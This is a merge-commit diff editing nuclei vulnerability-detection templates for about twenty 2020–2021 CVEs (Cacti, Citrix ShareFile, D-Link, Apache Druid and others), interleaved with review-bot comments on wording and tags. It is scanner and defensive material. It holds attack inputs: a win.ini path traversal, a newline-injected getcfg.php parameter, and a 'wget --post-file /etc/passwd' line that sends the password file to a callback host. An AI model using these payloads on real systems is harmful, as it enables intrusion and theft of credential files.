Merge pull request #4681 from MostInterestingBotInTheWorld/dashboard

Dashboard Content Enhancements
patch-1
Prince Chaddha 2022-06-28 08:54:11 +05:30 committed by GitHub
commit 50e12a7297
GPG Key ID: 4AEE18F83AFDEB23
22 changed files with 189 additions and 130 deletions

@ -1,15 +1,16 @@
id: CVE-2020-8813
info:
name: Cacti v1.2.8 - Unauthenticated Remote Code Execution
name: Cacti v1.2.8 - Remote Code Execution
author: gy741
severity: high
description: This vulnerability could be exploited without authentication if Cacti is enabling "Guest Realtime Graphs" privilege, So in this case no need for the authentication part and you can just use the following code to exploit the vulnerability.
description: Cacti v1.2.8 is susceptible to remote code execution. This vulnerability could be exploited without authentication if "Guest Realtime Graphs" privileges are enabled.
reference:
- https://shells.systems/cacti-v1-2-8-authenticated-remote-code-execution-cve-2020-8813/
- https://github.com/Cacti/cacti/releases
- https://gist.github.com/mhaskar/ebe6b74c32fd0f7e1eedf1aabfd44129
- https://drive.google.com/file/d/1A8hxTyk_NgSp04zPX-23nPbsSDeyDFio/view
- https://nvd.nist.gov/vuln/detail/CVE-2020-8813
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
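Review bot: the rewritten description still says the issue is exploitable without authentication when "Guest Realtime Graphs" privileges are enabled, yet the CVSS vector kept below is PR:L and the shells.systems reference in this same block is titled "authenticated-remote-code-execution"; say explicitly that the default path needs an authenticated user and that the unauthenticated path only exists when the guest privilege is enabled, so the prose and the severity metadata agree.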
@ -29,3 +30,5 @@ requests:
part: interactsh_protocol # Confirms the HTTP Interaction
words:
- "http"
# Enhanced by mp on 2022/06/27
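Review bot: the trailing `# Enhanced by mp on 2022/06/27` comment is appended to every template in this PR, but a YAML comment at end of file is invisible to nuclei and cannot be filtered on; if the intent is to record review state, a key under `metadata:` would be queryable, otherwise this is fine as a changelog marker.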

@ -1,14 +1,15 @@
id: CVE-2020-8982
info:
name: Citrix ShareFile StorageZones Unauthenticated Arbitrary File Read
name: Citrix ShareFile StorageZones <=5.10.x - Arbitrary File Read
author: dwisiswant0
severity: high
description: An unauthenticated arbitrary file read issue exists in all versions of Citrix ShareFile StorageZones (aka storage zones) Controller, including the most recent 5.10.x releases as of May 2020.
description: Citrix ShareFile StorageZones (aka storage zones) Controller versions through at least 5.10.x are susceptible to an unauthenticated arbitrary file read vulnerability.
reference:
- https://support.citrix.com/article/CTX269106
- https://drive.google.com/file/d/1Izd5MF_HHuq8YSwAyJLBErWL_nbe6f9v/view
- https://www.linkedin.com/posts/jonas-hansen-2a2606b_citrix-sharefile-storage-zones-controller-activity-6663432907455025152-8_w6/
- https://nvd.nist.gov/vuln/detail/CVE-2020-8982
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -20,15 +21,20 @@ requests:
- method: GET
path:
- "{{BaseURL}}/XmlPeek.aspx?dt=\\\\..\\\\..\\\\..\\\\..\\\\..\\\\..\\\\Windows\\\\win.ini&x=/validate.ashx?requri"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "bit app support"
- "fonts"
- "extensions"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27
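Review bot: moving the status matcher below the word matcher and placing `part: body` above `words:` is behaviour-neutral under `matchers-condition: and` (every matcher must still pass), so this hunk is a pure style change; that is fine, provided the same ordering is applied to all 22 files in the PR rather than only some of them.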

@ -1,38 +1,33 @@
id: CVE-2020-9047
info:
name: exacqVision Web Service RCE
name: exacqVision Web Service - Remote Code Execution
author: dwisiswant0
severity: high
description: |
This template supports the detection part only. See references.
A vulnerability exists that could allow the execution of
unauthorized code or operating system commands on systems
running exacqVision Web Service versions 20.06.3.0 and prior
and exacqVision Enterprise Manager versions 20.06.4.0 and prior.
An attacker with administrative privileges could potentially
download and run a malicious executable that
could allow OS command injection on the system.
exacqVision Web Service is susceptible to remote code execution which could allow the execution of unauthorized code or operating system commands on systems running exacqVision Web Service versions 20.06.3.0 and prior and exacqVision Enterprise Manager versions 20.06.4.0 and prior. An attacker with administrative privileges could potentiallydownload and run a malicious executable that could allow OS command injection on the system.
reference:
- https://github.com/norrismw/CVE-2020-9047
- https://www.johnsoncontrols.com/cyber-solutions/security-advisories
- https://www.us-cert.gov/ics/advisories/ICSA-20-170-01
- https://nvd.nist.gov/vuln/detail/CVE-2020-9047
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.2
cve-id: CVE-2020-9047
cwe-id: CWE-347
tags: cve,cve2020,rce,exacqvision,service
tags: cve,cve2020,rce,exacqvision
requests:
- method: GET
path:
- "{{BaseURL}}/version.web"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "3.10.4.72058"
- "3.12.4.76544"
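Review bot: the new description has a missing space in "potentiallydownload". Dropping the sentence "This template supports the detection part only. See references." also removes a useful caveat: the matchers below only fingerprint version strings returned by `version.web`, they do not confirm exploitability, and readers should know that; suggest keeping that sentence. Removing the `service` tag is fine.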
@ -59,7 +54,9 @@ requests:
- "20.03.2.0"
- "20.06.3.0"
condition: or
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,21 +1,23 @@
id: CVE-2020-9315
info:
name: Oracle iPlanet Improper Authorization
name: Oracle iPlanet Web Server 7.0.x - Authentication Bypass
author: dhiyaneshDk
severity: high
description: '** PRODUCT NOT SUPPORTED WHEN ASSIGNED ** Oracle iPlanet Web Server 7.0.x has Incorrect Access Control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE: a related support policy can be found in the www.oracle.com references attached to this CVE.'
description: |
Oracle iPlanet Web Server 7.0.x has incorrect access control for admingui/version URIs in the Administration console, as demonstrated by unauthenticated read access to encryption keys. NOTE a related support policy can be found in the www.oracle.com references attached to this CVE.
reference:
- https://www.cvebase.com/cve/2020/9315
- https://www.oracle.com/support/lifetime-support/
- https://www.oracle.com/us/assets/lifetime-support-middleware-069163.pdf
- https://wwws.nightwatchcybersecurity.com/2020/05/10/two-vulnerabilities-in-oracles-iplanet-web-server-cve-2020-9315-and-cve-2020-9314/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9315
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9315
cwe-id: CWE-306
tags: cve,cve2020,oracle
tags: cve,cve2020,oracle,auth-bypass,iplanet
requests:
- method: GET
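Review bot: "NOTE a related support policy" lost its colon in the rewrite ("NOTE: a related support policy ..."). The "** PRODUCT NOT SUPPORTED WHEN ASSIGNED **" marker was also dropped; since the Oracle lifetime-support references are kept, a short "NOTE: this product is no longer supported by the vendor" line, as done for the D-Link DIR-610 template in this same PR, would preserve that context.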
@ -37,4 +39,6 @@ requests:
- type: status
status:
- 200
- 200
# Enhanced by mp on 2022/06/27

@ -1,22 +1,23 @@
id: CVE-2020-9376
info:
name: D-Link Information Disclosure via getcfg.php
name: D-Link DIR-610 Devices - Information Disclosure
author: whynotke
severity: high
description: |
D-Link DIR-610 devices allow Information Disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
D-Link DIR-610 devices allow information disclosure via SERVICES=DEVICE.ACCOUNT%0AAUTHORIZED_GROUP=1 to getcfg.php.
NOTE: This vulnerability only affects products that are no longer supported by the maintainer.
reference:
- https://gist.github.com/GouveaHeitor/dcbb67b301cc45adc00f8a6a2a0a590f
- https://supportannouncement.us.dlink.com/announcement/publication.aspx?name=SAP10182
- https://www.dlink.com.br/produto/dir-610/
- https://nvd.nist.gov/vuln/detail/CVE-2020-9376
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9376
cwe-id: CWE-74
tags: cve,cve2020,dlink,disclosure
tags: cve,cve2020,dlink,disclosure,router
requests:
- method: POST
@ -29,14 +30,16 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "<name>Admin</name>"
- "</usrid>"
- "</password>"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,33 +1,38 @@
id: CVE-2020-9425
info:
name: rConfig Unauthenticated Sensitive Information Disclosure
name: rConfig <3.9.4 - Sensitive Information Disclosure
author: madrobot
severity: high
description: An issue was discovered in includes/head.inc.php in rConfig before 3.9.4. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application
does not exit after a redirect is applied, the rest of the page still executed, resulting in the disclosure of cleartext credentials in the response.
description: rConfig prior to version 3.9.4 is susceptible to sensitive information disclosure. An unauthenticated attacker can retrieve saved cleartext credentials via a GET request to settings.php. Because the application does not exit after a redirect is applied, the rest of the page still executes, resulting in the disclosure of cleartext credentials in the response.
reference:
- https://blog.hivint.com/rconfig-3-9-3-unauthenticated-sensitive-information-disclosure-ead4ed88f153
- https://github.com/rconfig/rconfig/commit/20f4e3d87e84663d922b937842fddd9af1b68dd9
- https://nvd.nist.gov/vuln/detail/CVE-2020-9425
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2020-9425
cwe-id: CWE-670
tags: cve,cve2020,rconfig
tags: cve,cve2020,rconfig.exposure
requests:
- method: GET
path:
- "{{BaseURL}}/settings.php"
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: body
words:
- "defaultNodeUsername"
- "defaultNodePassword"
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27
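Review bot: the new tags line `tags: cve,cve2020,rconfig.exposure` uses a period instead of a comma, so nuclei will read a single tag "rconfig.exposure" and neither `-tags rconfig` nor `-tags exposure` will select this template any more; change it to `tags: cve,cve2020,rconfig,exposure`.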

@ -1,10 +1,10 @@
id: CVE-2020-9490
info:
name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest DoS
name: Apache HTTP Server 2.4.20-2.4.43 - HTTP/2 Cache-Digest Denial of Service Attack
author: philippedelteil
severity: high
description: Apache HTTP Server versions 2.4.20 to 2.4.43. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
description: Apache HTTP Server versions 2.4.20 to 2.4.43 are susceptible to a denial of service attack. A specially crafted value for the 'Cache-Digest' header in a HTTP/2 request would result in a crash when the server actually tries to HTTP/2 PUSH a resource afterwards. Configuring the HTTP/2 feature via "H2Push off" will mitigate this vulnerability for unpatched servers.
reference:
- https://httpd.apache.org/security/vulnerabilities_24.html
- https://bugs.chromium.org/p/project-zero/issues/detail?id=2030
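Review bot: the new name ends in "Denial of Service Attack", which breaks the "<Product> <Version> - <Impact>" pattern every other rename in this PR follows; "Denial of Service" alone is enough. In the description, "a HTTP/2 request" should read "an HTTP/2 request".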
@ -24,6 +24,8 @@ requests:
matchers:
- type: regex
part: header
regex:
- "Apache/2\\.4\\.([3-3][0-9]|2[0-9]|4[0-3])"
part: header
# Enhanced by mp on 2022/06/27
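Review bot: unrelated to the `part: header` move, the header regex uses the character class `[3-3]`, which is just a verbose `3`; `Apache/2\\.4\\.(3[0-9]|2[0-9]|4[0-3])` is clearer and matches the same 2.4.20 to 2.4.43 range. Since this is a banner-only check, it is worth a comment that servers with `ServerTokens Prod` will not match even when vulnerable.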

@ -1,22 +1,22 @@
id: CVE-2021-20123
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion DownloadFileServlet
name: Draytek VigorConnect 1.6.0-B - Local File Inclusion
author: 0x_Akoko
severity: high
description: |
A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the DownloadFileServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.cvedetails.com/cve/CVE-2021-20123/
- https://nvd.nist.gov/vuln/detail/CVE-2021-20123
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20123
cwe-id: CWE-668
metadata:
shodan-query: http.html:"VigorConnect"
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
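Review bot: the new name truncates the version to "1.6.0-B" while the description on the next lines says 1.6.0-B3; use "Draytek VigorConnect 1.6.0-B3 - Local File Inclusion". The `verified: true` / `shodan-query` swap under `metadata:` is order-only and fine.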
@ -28,7 +28,9 @@ requests:
stop-at-first-match: true
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- "for 16-bit app support"
@ -42,3 +44,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,22 +1,22 @@
id: CVE-2021-20124
info:
name: Draytek VigorConnect - Unauthenticated Local File Inclusion WebServlet
name: Draytek VigorConnect 6.0-B3 - Local File Inclusion
author: 0x_Akoko
severity: high
description: A local file inclusion vulnerability exists in Draytek VigorConnect 1.6.0-B3 in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
description: Draytek VigorConnect 1.6.0-B3 is susceptible to local file inclusion in the file download functionality of the WebServlet endpoint. An unauthenticated attacker could leverage this vulnerability to download arbitrary files from the underlying operating system with root privileges.
reference:
- https://www.tenable.com/security/research/tra-2021-42
- https://www.draytek.com/products/vigorconnect/
- https://www.cvedetails.com/cve/CVE-2021-20124
- https://nvd.nist.gov/vuln/detail/CVE-2021-20124
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
cve-id: CVE-2021-20124
cwe-id: CWE-668
metadata:
shodan-query: http.html:"VigorConnect"
verified: true
shodan-query: http.html:"VigorConnect"
tags: cve,cve2021,draytek,lfi,vigorconnect
requests:
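Review bot: the new name reads "Draytek VigorConnect 6.0-B3", dropping the leading "1." from the version; the description immediately below says 1.6.0-B3, and the sibling CVE-2021-20123 template in this PR should carry the same version string. Fix to "Draytek VigorConnect 1.6.0-B3 - Local File Inclusion".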
@ -42,3 +42,5 @@ requests:
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,15 +1,15 @@
id: CVE-2021-21287
info:
name: MinIO Browser API SSRF
name: MinIO Browser API - Server-Side Request Forgery
author: pikpikcu
severity: high
description: MinIO is a High Performance Object Storage released under Apache License v2.0. In MinIO before version RELEASE.2021-01-30T00-20-58Z there is a server-side request forgery vulnerability.
description: MinIO Browser API before version RELEASE.2021-01-30T00-20-58Z contains a server-side request forgery vulnerability.
reference:
- https://github.com/minio/minio/security/advisories/GHSA-m4qq-5f7c-693q
- https://www.leavesongs.com/PENETRATION/the-collision-of-containers-and-the-cloud-pentesting-a-MinIO.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
- https://github.com/minio/minio/pull/11337
- https://nvd.nist.gov/vuln/detail/CVE-2021-21287
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:N/A:N
cvss-score: 7.7
@ -37,4 +37,6 @@ requests:
- type: word
words:
- "We encountered an internal error"
- "We encountered an internal error"
# Enhanced by mp on 2022/06/27

@ -1,14 +1,16 @@
id: CVE-2021-21311
info:
name: Adminer SSRF Using Verbose Error Messages
name: Adminer <4.7.9 - Server-Side Request Forgery
author: Adam Crosser
severity: high
description: Adminer is an open-source database management in a single PHP file. In adminer from version 4.0.0 and before 4.7.9 there is a server-side request forgery vulnerability. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected. This is fixed in version 4.7.9.
description: Adminer from version 4.0.0 through 4.7.8 is susceptible to server-side request forgery due to its use of verbose error messages. Users of Adminer versions bundling all drivers (e.g. `adminer.php`) are affected.
remediation: Upgrade to version 4.7.9 or later.
reference:
- https://github.com/vrana/adminer/security/advisories/GHSA-x5r2-hj5c-8jx6
- https://github.com/vrana/adminer/files/5957311/Adminer.SSRF.pdf
- https://packagist.org/packages/vrana/adminer
- https://nvd.nist.gov/vuln/detail/CVE-2021-21311
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
cvss-score: 7.2
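Review bot: good to see a `remediation:` field added here. Several other templates rewritten in this PR already name the fixed version in their description (rConfig 3.9.4, Hystrix Dashboard 2.2.10, Button Generator 2.3.3) but get no `remediation:` key; applying the field consistently across the PR would make it useful for tooling.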
@ -25,11 +27,14 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 403
- type: word
part: body
words:
- "&lt;title&gt;400 - Bad Request&lt;/title&gt;"
- "<title>400 - Bad Request</title>"
- type: status
status:
- 403
# Enhanced by mp on 2022/06/27
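Review bot: changing the word matcher from `&lt;title&gt;400 - Bad Request&lt;/title&gt;` to `<title>400 - Bad Request</title>` is a behavioural change, not a cosmetic one: the original author matched the HTML-entity-encoded form, presumably because the verbose error message is escaped when Adminer echoes it into its own page, so the raw-tag form may never appear in the body and the template would silently stop matching. Please verify against a real pre-4.7.9 response before merging, or match on a substring present in both forms such as `400 - Bad Request`.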

@ -1,20 +1,22 @@
id: CVE-2021-21315
info:
name: Node.js Systeminformation Command Injection
name: Node.JS System Information Library <5.3.1 - Remote Command Injection
author: pikpikcu
severity: high
description: The System Information Library for Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information. In systeminformation before version 5.3.1 there is a command injection vulnerability. Problem was fixed in version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected.
description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
reference:
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
- https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
- https://www.npmjs.com/package/systeminformation
- https://nvd.nist.gov/vuln/detail/CVE-2021-21315
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
tags: nodejs,cve,cve2021,cisa
requests:
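Review bot: the new description reads "Node.JS System Information Library System before version 5.3.1", with a stray second "System", and its second sentence now says "Node.JS (npm package "systeminformation") is an open source collection of functions", attributing the package to Node.JS itself; suggest "The Node.JS systeminformation library (npm package "systeminformation") before version 5.3.1 is susceptible to command injection." The name also says "Remote Command Injection" while the CVSS vector kept below is AV:L/PR:L; either drop "Remote" or revisit the vector. The new `remediation:` line is missing its terminating period.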
@ -26,19 +28,21 @@ requests:
matchers:
- type: word
words:
- "application/json"
part: header
- type: word
part: body
words:
- "wget --post-file /etc/passwd {{interactsh-url}}"
- name
- running
- pids
part: body
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,21 +1,23 @@
id: CVE-2021-21389
info:
name: BuddyPress REST API Privilege Escalation to RCE
name: BuddyPress REST API <7.2.1 - Privilege Escalation/Remote Code Execution
author: lotusdll
severity: high
description: The BuddyPress WordPress plugin was affected by an REST API Privilege Escalation to RCE
description: WordPress BuddyPress before version 7.2.1 is susceptible to a privilege escalation vulnerability that can be leveraged to perform remote code execution.
remediation: This issue has been remediated in WordPress BuddyPress 7.2.1.
reference:
- https://github.com/HoangKien1020/CVE-2021-21389
- https://buddypress.org/2021/03/buddypress-7-2-1-security-release/
- https://codex.buddypress.org/releases/version-7-2-1/
- https://github.com/buddypress/BuddyPress/security/advisories/GHSA-m6j4-8r7p-wpp3
- https://nvd.nist.gov/vuln/detail/CVE-2021-21389
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
cve-id: CVE-2021-21389
cwe-id: CWE-863
tags: cve,cve2021,wordpress,wp-plugin,rce
tags: cve,cve2021,wordpress,wp-plugin,rce,wp,buddypress
requests:
- raw:
@ -33,20 +35,23 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: word
part: body
words:
- "user_login"
- "registered"
- "activation_key"
- "user_email"
part: body
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,13 +1,14 @@
id: CVE-2021-21975
info:
name: vRealize Operations Manager API SSRF (VMWare Operations)
name: vRealize Operations Manager API - Server-Side Request Forgery
author: luci
severity: high
description: A malicious actor with network access to the vRealize Operations Manager API can perform a Server Side Request Forgery attack to steal administrative credentials or trigger Remote Code Execution using CVE-2021-21983.
description: vRealize Operations Manager API is susceptible to server-side request forgery. A malicious actor with network access to the vRealize Operations Manager API can steal administrative credentials or trigger remote code execution using CVE-2021-21983.
reference:
- https://www.vmware.com/security/advisories/VMSA-2021-0004.html
- http://packetstormsecurity.com/files/162349/VMware-vRealize-Operations-Manager-Server-Side-Request-Forgery-Code-Execution.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-21975
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -26,13 +27,17 @@ requests:
matchers-condition: and
matchers:
- type: word
part: body
words:
- 'vRealize Operations Manager'
- 'thumbprint'
- 'address'
condition: and
part: body
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,16 +1,15 @@
id: CVE-2021-22053
info:
name: RCE through SpringEL expressions in Spring Cloud Netflix Hystrix Dashboard < 2.2.10.RELEASE
name: Spring Cloud Netflix Hystrix Dashboard <2.2.10 - Remote Code Execution
author: forgedhallpass
severity: high
description: |
Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates.
When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
Spring Cloud Netflix Hystrix Dashboard prior to version 2.2.10 is susceptible to remote code execution. Applications using both `spring-cloud-netflix-hystrix-dashboard` and `spring-boot-starter-thymeleaf` expose a way to execute code submitted within the request URI path during the resolution of view templates. When a request is made at `/hystrix/monitor;[user-provided data]`, the path elements following `hystrix/monitor` are being evaluated as SpringEL expressions, which can lead to code execution.
reference:
- https://nvd.nist.gov/vuln/detail/CVE-2021-22053
- https://github.com/SecCoder-Security-Lab/spring-cloud-netflix-hystrix-dashboard-cve-2021-22053
- https://tanzu.vmware.com/security/cve-2021-22053
- https://nvd.nist.gov/vuln/detail/CVE-2021-22053
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
@ -25,10 +24,14 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 500
- type: word
part: interactsh_protocol
words:
- "dns"
- type: status
status:
- 500
# Enhanced by mp on 2022/06/27

@ -1,14 +1,14 @@
id: CVE-2021-22054
info:
name: VMWare Workspace One UEM SSRF
name: VMWare Workspace ONE UEM - Server-Side Request Forgery
author: h1ei1
severity: high
description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain an SSRF vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
description: VMware Workspace ONE UEM console 20.0.8 prior to 20.0.8.37, 20.11.0 prior to 20.11.0.40, 21.2.0 prior to 21.2.0.27, and 21.5.0 prior to 21.5.0.37 contain a server-side request forgery vulnerability. This issue may allow a malicious actor with network access to UEM to send their requests without authentication and to gain access to sensitive information.
reference:
- https://blog.assetnote.io/2022/04/27/vmware-workspace-one-uem-ssrf/
- https://nvd.nist.gov/vuln/detail/CVE-2021-22054
- https://www.vmware.com/security/advisories/VMSA-2021-0029.html
- https://nvd.nist.gov/vuln/detail/CVE-2021-22054
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
cvss-score: 7.5
@ -25,10 +25,13 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "Interactsh Server"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,16 +1,11 @@
id: CVE-2021-22214
info:
name: Unauthenticated Gitlab SSRF - CI Lint API
name: Gitlab CE/EE 10.5 - Server-Side Request Forgery
author: Suman_Kar,GitLab Red Team
severity: high
description: |
When requests to the internal network for webhooks are enabled,
a server-side request forgery vulnerability in GitLab CE/EE affecting all
versions starting from 10.5 was possible to exploit for an unauthenticated
attacker even on a GitLab instance where registration is limited.
The same vulnerability actually spans multiple CVEs, due to similar reports
that were fixed across separate patches. These CVEs are:
GitLab CE/EE versions starting from 10.5 are susceptible to a server-side request forgery vulnerability when requests to the internal network for webhooks are enabled, even on a GitLab instance where registration is limited. The same vulnerability actually spans multiple CVEs, due to similar reports that were fixed across separate patches. These CVEs are:
- CVE-2021-39935
- CVE-2021-22214
- CVE-2021-22175
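Review bot: the new name "Gitlab CE/EE 10.5 - Server-Side Request Forgery" reads as if only 10.5 is affected, whereas the description says all versions starting from 10.5; use ">=10.5" (or the fixed version, if the references give one). The rewrite also dropped "unauthenticated attacker" from the old text, which was the key severity detail; reinstate it, e.g. "... exploitable by an unauthenticated attacker even on an instance where registration is limited".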
@ -47,3 +42,5 @@ requests:
part: body
words:
- "does not have valid YAML syntax"
# Enhanced by mp on 2022/06/27

@ -1,10 +1,10 @@
id: CVE-2021-25052
info:
name: The Button Generator WordPress plugin < 2.3.3 - RFI
name: WordPress Button Generator <2.3.3 - Remote File Inclusion
author: cckuailong
severity: high
description: The Button Generator WordPress plugin before 2.3.3 within the wow-company admin menu page allows to include() arbitrary file with PHP extension (as well as with data:// or http:// protocols), thus leading to CSRF RCE.
description: WordPress Button Generator before 2.3.3 within the wow-company admin menu page allows arbitrary file inclusion with PHP extensions (as well as with data:// or http:// protocols), thus leading to cross-site request forgery and remote code execution.
reference:
- https://wpscan.com/vulnerability/a01844a0-0c43-4d96-b738-57fe5bfbd67a
- https://nvd.nist.gov/vuln/detail/CVE-2021-25052
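Review bot: "thus leading to cross-site request forgery and remote code execution" changes the meaning of the original "CSRF RCE": the include() sits on an admin menu page, so cross-site request forgery is the delivery vector and remote code execution is the impact, not two separate outcomes. Suggest "... thus leading to remote code execution via cross-site request forgery".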
@ -34,12 +34,15 @@ requests:
cookie-reuse: true
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
part: interactsh_protocol
name: http
words:
- "http"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,17 +1,17 @@
id: CVE-2021-25646
info:
name: Apache Druid RCE
name: Apache Druid - Remote Code Execution
author: pikpikcu
severity: high
description: |
Apache Druid is a column-oriented open source distributed data storage written in Java, designed to quickly obtain large amounts of event data and provide low-latency queries on the data.
Apache Druid lacks authorization and authentication by default. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
Apache Druid is susceptible to remote code execution because by default it lacks authorization and authentication. Attackers can send specially crafted requests to execute arbitrary code with the privileges of processes on the Druid server.
reference:
- https://paper.seebug.org/1476/
- https://lists.apache.org/thread.html/rfda8a3aa6ac06a80c5cbfdeae0fc85f88a5984e32ea05e6dda46f866%40%3Cdev.druid.apache.org%3E
- http://www.openwall.com/lists/oss-security/2021/01/29/6
- https://lists.apache.org/thread.html/r64431c2b97209f566b5dff92415e7afba0ed3bfab4695ebaa8a62e5d@%3Cdev.druid.apache.org%3E
- https://nvd.nist.gov/vuln/detail/CVE-2021-25864
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 8.8
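Review bot: the reference list still points to https://nvd.nist.gov/vuln/detail/CVE-2021-25864, which is the Hue Magic CVE edited later in this PR, not CVE-2021-25646 (the `id:` at the top of this file); since the info block is being rewritten anyway, correct the link to CVE-2021-25646.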
@ -63,22 +63,25 @@ requests:
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- "application/json"
part: header
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: word
part: body
words:
- "numRowsRead"
- "numRowsIndexed"
part: body
condition: and
- type: regex
regex:
- "root:.*:0:0:"
part: body
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# Enhanced by mp on 2022/06/27

@ -1,13 +1,13 @@
id: CVE-2021-25864
info:
name: Hue Magic - Directory Traversal
name: Hue Magic 3.0.0 - Local File Inclusion
author: 0x_Akoko
severity: high
description: node-red-contrib-huemagic 3.0.0 is affected by hue/assets/..%2F Directory Traversal.in the res.sendFile API, used in file hue-magic.js, to fetch an arbitrary file.
description: Hue Magic 3.0.0 is susceptible to local file inclusion via the res.sendFile API.
reference:
